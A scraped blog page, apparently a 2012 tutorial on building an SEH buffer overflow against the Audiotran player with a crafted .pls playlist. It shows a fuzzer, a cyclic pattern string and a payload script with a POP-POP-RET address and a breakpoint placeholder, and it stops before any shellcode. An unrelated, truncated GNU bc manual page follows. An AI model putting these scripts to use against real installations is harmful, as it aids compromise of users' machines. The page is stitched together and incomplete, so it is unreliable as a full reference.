Application Hunter

Kamis, 18 Oktober 2012

Exploit Audiotran With Buffer Overflow SEH

here I will try to make fuzzer for exploit application Audiotran.with order

#/usr/bin/python
data="\x90" * 6000
f=open("naruto.pls","w")
f.write(data)
f.close()
first I try save type file.pls on desktop then I open application immunitydbg or ollydbg and audiotran then I klik Load Playlist prove I save application nothing.
I try to move the file to C:\Program Files\Audiotran and I try running two application were.then I klik load playlist from audiotran and I load file name .pls it can't be.and I try make to file original from audiotran and I copy script result from fuzzer I made to file original from audiotran and result is

and I will make value from pattern_create and insert in fuzzer result is

#/usr/bin/python
data="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9"
f=open("naruto.pls","w")
f.write(data)
f.close()

I search file are not protected order is

and I search value fro DllCharacteristick order is

last I search value from pattern_offset for insert into the my fuzzer with orders

Next, i search the location command POP, POP RETN in this module

From the result above, i can see if the buffer value \x41 has succes entry inside the SEH Handler. Ok, next i modification my fuzzer script again.

#/usr/bin/python
data="\x90" * 1312
data+="\xcc\xcc\xcc\xcc"
data+="\x0f\x1f\x42\x73"
data+="\x90" * (6004-len(data))
f=open("naruto.pls","w")
f.write(data)
f.close()

to be Continue

BC

bc - An arbitrary precision calculator language

SYNTAX

bc [ -hlwsqv ] [long-options] [ file ... ]

DESCRIPTION

bc is a language that supports arbitrary precision numbers with interactive execution of statements. There are some similarities in the syntax to the C programming language. A standard math library is available by command line option. If requested, the math library is defined before processing any files. bc starts by processing code from all the files listed on the command line in the order listed. After all files have been processed, bc reads from the standard input. All code is executed as it is read. (If a file contains a command to halt the processor, bc will never read from the standard input.) This version of bc contains several extensions beyond traditional bc implementations and the POSIX draft standard. Command line options can cause these extensions to print a warning or to be rejected. This document describes the language accepted by this processor. Extensions will be identified as such.

OPTIONS

-h, --help: Print the usage and exit.
-i, --interactive: Force interactive mode.
-l, --mathlib: Define the standard math library.
-w, --warn: Give warnings for extensions to POSIX bc.
-s, --standard: Process exactly the POSIX bc language.
-q, --quiet: Do not print the normal GNU bc welcome.
-v, --version: Print the version number and copyright and quit.

NUMBERS

The most basic element in bc is the number. Numbers are arbitrary precision numbers. This precision is both in the integer part and the fractional part. All numbers are represented internally in decimal and all computation is done in decimal. (This version truncates results from divide and multiply operations.) There are two attributes of numbers, the length and the scale. The length is the total number of significant decimal digits in a number and the scale is the total number of decimal digits after the decimal point. For example:




 .000001 has a length of 6 and scale of 6.
 1935.000 has a length of 7 and a scale of 3.

VARIABLES

Numbers are stored in two types of variables, simple variables and arrays. Both simple variables and array variables are named. Names begin with a letter followed by any number of letters, digits and underscores. All letters must be lower case. (Full alpha-numeric names are an extension. In POSIX bc all names are a single lower case letter.) The type of variable is clear by the context because all array variable names will be followed by brackets ([]). There are four special variables, scale, ibase, obase, and last. scale defines how some operations use digits after the decimal point. The default value of scale is 0. ibase and obase define the conversion base for input and output numbers. The default for both input and output is base 10. last (an extension) is a variable that has the value of the last printed number. These will be discussed in further detail where appropriate. All of these variables may have values assigned to them as well as used in expressions.

COMMENTS

Comments in bc start with the characters /* and end with the characters */. Comments may start anywhere and appear as a single space in the input. (This causes comments to delimit other input items. For example, a comment can not be found in the middle of a variable name.) Comments include any newlines (end of line) between the start and the end of the comment. To support the use of scripts for bc, a single line comment has been added as an extension. A single line comment starts at a # character and continues to the next end of the line. The end of line character is not part of the comment and is processed normally.

EXPRESSIONS

The numbers are manipulated by expressions and statements. Since the language was designed to be interactive, statements and expressions are executed as soon as possible. There is no "main" program. Instead, code is executed as it is encountered. (Functions, discussed in detail later, are defined when encountered.) A simple expression is just a constant. bc converts constants into internal decimal numbers using the current input base, specified by the variable ibase. (There is an exception in functions.) The legal values of ibase are 2 through 16. Assigning a value outside this range to ibase will result in a value of 2 or 16. Input numbers may contain the characters 0-9 and A-F. (Note: They must be capitals. Lower case letters are variable names.) Single digit numbers always have the value of the digit regardless of the value of ibase. (i.e. A = 10.) For multi-digit numbers, bc changes all input digits greater or equal to ibase to the value of ibase-1. This makes the number FFF always be the largest 3 digit number of the input base.
Full expressions are similar to many other high level languages. Since there is only one kind of number, there are no rules for mixing types. Instead, there are rules on the scale of expressions. Every expression has a scale. This is derived from the scale of original numbers, the operation performed and in many cases, the value of the variable scale. Legal values of the variable scale are 0 to the maximum number representable by a C integer.
In the following descriptions of legal expressions, "expr" refers to a complete expression and "var" refers to a simple or an array variable. A simple variable is just a

: name

and an array variable is specified as

: name[expr]

Unless specifically mentioned the scale of the result is the maximum scale of the expressions involved.

- expr: The result is the negation of the expression.
++ var: The variable is incremented by one and the new value is the result of the expression.
-- var: The variable is decremented by one and the new value is the result of the expression.
var ++: The result of the expression is the value of the variable and then the variable is incremented by one.
var --: The result of the expression is the value of the variable and then the variable is decremented by one.
expr + expr: The result of the expression is the sum of the two expressions.
expr - expr: The result of the expression is the difference of the two expressions.
expr * expr: The result of the expression is the product of the two expressions.
expr / expr: The result of the expression is the quotient of the two expressions. The scale of the result is the value of the variable scale.
expr % expr: The result of the expression is the "remainder" and it is computed in the following way. To compute a%b, first a/b is computed to scale digits. That result is used to compute a-(a/b)*b to the scale of the maximum of scale+scale(b) and scale(a). If scale is set to zero and both expressions are integers this expression is the integer remainder function.
expr ^ expr: The result of the expression is the value of the first raised to the second. The second expression must be an integer. (If the second expression is not an integer, a warning is generated and the expression is truncated to get an integer value.) The scale of the result is scale if the exponent is negative. If the exponent is positive the scale of the result is the minimum of the scale of the first expression times the value of the exponent and the maximum of scale and the scale of the first expression. (e.g. scale(a^b) = min(scale(a)*b, max( scale, scale(a))).) It should be noted that expr^0 will always return the value of 1.
( expr ): This alters the standard precedence to force the evaluation of the expression.
var = expr: The variable is assigned the value of the expression.
var = expr: This is equivalent to "var = var expr" with the exception that the "var" part is evaluated only once. This can make a difference if "var" is an array.

Relational expressions are a special kind of expression that always evaluate to 0 or 1, 0 if the relation is false and 1 if the relation is true. These may appear in any legal expression. (POSIX bc requires that relational expressions are used only in if, while, and for statements and that only one relational test may be done in them.) The relational operators are

expr1 < expr2: The result is 1 if expr1 is strictly less than expr2.
expr1 <= expr2: The result is 1 if expr1 is less than or equal to expr2.
expr1 > expr2: The result is 1 if expr1 is strictly greater than expr2.
expr1 >= expr2: The result is 1 if expr1 is greater than or equal to expr2.
expr1 == expr2: The result is 1 if expr1 is equal to expr2.
expr1 != expr2: The result is 1 if expr1 is not equal to expr2.

Boolean operations are also legal. (POSIX bc does NOT have boolean operations). The result of all boolean operations are 0 and 1 (for false and true) as in relational expressions. The boolean operators are:

!expr: The result is 1 if expr is 0.
expr && expr: The result is 1 if both expressions are non-zero.
expr || expr: The result is 1 if either expression is non-zero.

The expression precedence is as follows: (lowest to highest)




|| operator, left associative
&& operator, left associative
! operator, nonassociative
Relational operators, left associative
Assignment operator, right associative
+ and - operators, left associative
*, / and % operators, left associative
^ operator, right associative
unary - operator, nonassociative
++ and -- operators, nonassociative

This precedence was chosen so that POSIX compliant bc programs will run correctly. This will cause the use of the relational and logical operators to have some unusual behavior when used with assignment expressions. Consider the expression:

: a = 3 < 5

Most C programmers would assume this would assign the result of "3 < 5" (the value 1) to the variable "a". What this does in bc is assign the value 3 to the variable "a" and then compare 3 to 5. It is best to use parenthesis when using relational and logical operators with the assignment operators.
There are a few more special expressions that are provided in bc. These have to do with user defined functions and standard functions. They all appear as "name(parameters)". See the section on functions for user defined functions. The standard functions are:

length ( expression ): The value of the length function is the number of significant digits in the expression.
read ( ): The read function (an extension) will read a number from the standard input, regardless of where the function occurs. Beware, this can cause problems with the mixing of data and program in the standard input. The best use for this function is in a previously written program that needs input from the user, but never allows program code to be input from the user. The value of the read function is the number read from the standard input using the current value of the variable ibase for the conversion base.
scale ( expression ): The value of the scale function is the number of digits after the decimal point in the expression.
sqrt ( expression ): The value of the sqrt function is the square root of the expression. If the expression is negative, a run time error is generated.

STATEMENTS

Statements (as in most algebraic languages) provide the sequencing of expression evaluation. In bc statements are executed "as soon as possible." Execution happens when a newline in encountered and there is one or more complete statements. Due to this immediate execution, newlines are very important in bc. In fact, both a semicolon and a newline are used as statement separators. An improperly placed newline will cause a syntax error. Because newlines are statement separators, it is possible to hide a newline by using the backslash character. The sequence "\", where is the newline appears to bc as whitespace instead of a newline. A statement list is a series of statements separated by semicolons and newlines. The following is a list of bc statements and what they do: (Things enclosed in brackets ([]) are optional parts of the statement.)

expression

This statement does one of two things. If the expression starts with " ...", it is considered to be an assignment statement. If the expression is not an assignment statement, the expression is evaluated and printed to the output. After the number is printed, a newline is printed. For example, "a=1" is an assignment statement and "(a=1)" is an expression that has an embedded assignment. All numbers that are printed are printed in the base specified by the variable obase. The legal values for obase are 2 through BC_BASE_MAX. (See the section LIMITS.) For bases 2 through 16, the usual method of writing numbers is used. For bases greater than 16, bc uses a multi-character digit method of printing the numbers where each higher base digit is printed as a base 10 number. The multi-character digits are separated by spaces. Each digit contains the number of characters required to represent the base ten value of "obase-1". Since numbers are of arbitrary precision, some numbers may not be printable on a single output line. These long numbers will be split across lines using the "\" as the last character on a line. The maximum number of characters printed per line is 70. Due to the interactive nature of bc, printing a number causes the side effect of assigning the printed value to the special variable last. This allows the user to recover the last value printed without having to retype the expression that printed the number. Assigning to last is legal and will overwrite the last printed value with the assigned value. The newly assigned value will remain until the next number is printed or another value is assigned to last. (Some installations may allow the use of a single period (.) which is not part of a number as a short hand notation for for last.)

string

The string is printed to the output. Strings start with a double quote character and contain all characters until the next double quote character. All characters are take literally, including any newline. No newline character is printed after the string.

print list

The print statement (an extension) provides another method of output. The "list" is a list of strings and expressions separated by commas. Each string or expression is printed in the order of the list. No terminating newline is printed. Expressions are evaluated and their value is printed and assigned to the variable last. Strings in the print statement are printed to the output and may contain special characters. Special characters start with the backslash character (\). The special characters recognized by bc are "a" (alert or bell), "b" (backspace), "f" (form feed), "n" (newline), "r" (carriage return), "q" (double quote), "t" (tab), and "\" (backslash). Any other character following the backslash will be ignored.

{ statement_list }

This is the compound statement. It allows multiple statements to be grouped together for execution.

if ( expression ) statement1 [else statement2]

The if statement evaluates the expression and executes statement1 or statement2 depending on the value of the expression. If the expression is non-zero, statement1 is executed. If statement2 is present and the value of the expression is 0, then statement2 is executed. (The else clause is an extension.)

while ( expression ) statement

The while statement will execute the statement while the expression is non-zero. It evaluates the expression before each execution of the statement. Termination of the loop is caused by a zero expression value or the execution of a break statement.

for ( [expression1] ; [expression2] ; [expression3] ) statement

The for statement controls repeated execution of the statement. Expression1 is evaluated before the loop. Expression2 is evaluated before each execution of the statement. If it is non-zero, the statement is evaluated. If it is zero, the loop is terminated. After each execution of the statement, expression3 is evaluated before the reevaluation of expression2. If expression1 or expression3 are missing, nothing is evaluated at the point they would be evaluated. If expression2 is missing, it is the same as substituting the value 1 for expression2. (The optional expressions are an extension. POSIX bc requires all three expressions.) The following is equivalent code for the for statement:




expression1;
while (expression2) {
   statement;
   expression3;
}

break

This statement causes a forced exit of the most recent enclosing while statement or for statement.

continue

The continue statement (an extension) causes the most recent enclosing for statement to start the next iteration.

halt

The halt statement (an extension) is an executed statement that causes the bc processor to quit only when it is executed. For example, "if (0 == 1) halt" will not cause bc to terminate because the halt is not executed.

return

Return the value 0 from a function. (See the section on functions.)

return ( expression )

Return the value of the expression from a function. (See the section on functions.) As an extension, the parenthesis are not required.

PSEUDO STATEMENTS

These statements are not statements in the traditional sense. They are not executed statements. Their function is performed at "compile" time.

limits: Print the local limits enforced by the local version of bc. This is an extension.
quit: When the quit statement is read, the bc processor is terminated, regardless of where the quit statement is found. For example, "if (0 == 1) quit" will cause bc to terminate.
warranty: Print a longer warranty notice. This is an extension.

FUNCTIONS

Functions provide a method of defining a computation that can be executed later. Functions in bc always compute a value and return it to the caller. Function definitions are "dynamic" in the sense that a function is undefined until a definition is encountered in the input. That definition is then used until another definition function for the same name is encountered. The new definition then replaces the older definition. A function is defined as follows:




define name ( parameters ) { newline
    auto_list   statement_list }

A function call is just an expression of the form "name(parameters)". Parameters are numbers or arrays (an extension). In the function definition, zero or more parameters are defined by listing their names separated by commas. Numbers are only call by value parameters. Arrays are only call by variable. Arrays are specified in the parameter definition by the notation "name[]". In the function call, actual parameters are full expressions for number parameters. The same notation is used for passing arrays as for defining array parameters. The named array is passed by variable to the function. Since function definitions are dynamic, parameter numbers and types are checked when a function is called. Any mismatch in number or types of parameters will cause a runtime error. A runtime error will also occur for the call to an undefined function.
The auto_list is an optional list of variables that are for "local" use. The syntax of the auto list (if present) is "auto name, ... ;". (The semicolon is optional.) Each name is the name of an auto variable. Arrays may be specified by using the same notation as used in parameters. These variables have their values pushed onto a stack at the start of the function. The variables are then initialized to zero and used throughout the execution of the function. At function exit, these variables are popped so that the original value (at the time of the function call) of these variables are restored. The parameters are really auto variables that are initialized to a value provided in the function call. Auto variables are different than traditional local variables because if function A calls function B, B may access function A's auto variables by just using the same name, unless function B has called them auto variables. Due to the fact that auto variables and parameters are pushed onto a stack, bc supports recursive functions.
The function body is a list of bc statements. Again, statements are separated by semicolons or newlines. Return statements cause the termination of a function and the return of a value. There are two versions of the return statement. The first form, "return", returns the value 0 to the calling expression. The second form, "return ( expression )", computes the value of the expression and returns that value to the calling expression. There is an implied "return (0)" at the end of every function. This allows a function to terminate and return 0 without an explicit return statement.
Functions also change the usage of the variable ibase. All constants in the function body will be converted using the value of ibase at the time of the function call. Changes of ibase will be ignored during the execution of the function except for the standard function read, which will always use the current value of ibase for conversion of numbers.
As an extension, the format of the definition has been slightly relaxed. The standard requires the opening brace be on the same line as the define keyword and all other parts must be on following lines. This version of bc will allow any number of newlines before and after the opening brace of the function. For example, the following definitions are legal.





define d (n) { return (2*n); }
define d (n)
  { return (2*n); }

MATH LIBRARY

If bc is invoked with the -l option, a math library is preloaded and the default scale is set to 20. The math functions will calculate their results to the scale set at the time of their call. The math library defines the following functions:

s (x): The sine of x, x is in radians.
c (x): The cosine of x, x is in radians.
a (x): The arctangent of x, arctangent returns radians.
l (x): The natural logarithm of x.
e (x): The exponential function of raising e to the value x.
j (n,x): The bessel function of integer order n of x.

EXAMPLES

In /bin/sh, the following will assign the value of "pi" to the shell variable pi.

: pi=$(echo "scale=10; 4*a(1)" | bc -l)

The following is the definition of the exponential function used in the math library. This function is written in POSIX bc.





scale = 20

/* Uses the fact that e^x = (e^(x/2))^2
   When x is small enough, we use the series:
     e^x = 1 + x + x^2/2! + x^3/3! + ...
*/

define e(x) {
  auto  a, d, e, f, i, m, v, z

  /* Check the sign of x. */
  if (x<0) {
    m = 1
    x = -x
  } 

  /* Precondition x. */
  z = scale;
  scale = 4 + z + .44*x;
  while (x > 1) {
    f += 1;
    x /= 2;
  }

  /* Initialize the variables. */
  v = 1+x
  a = x
  d = 1
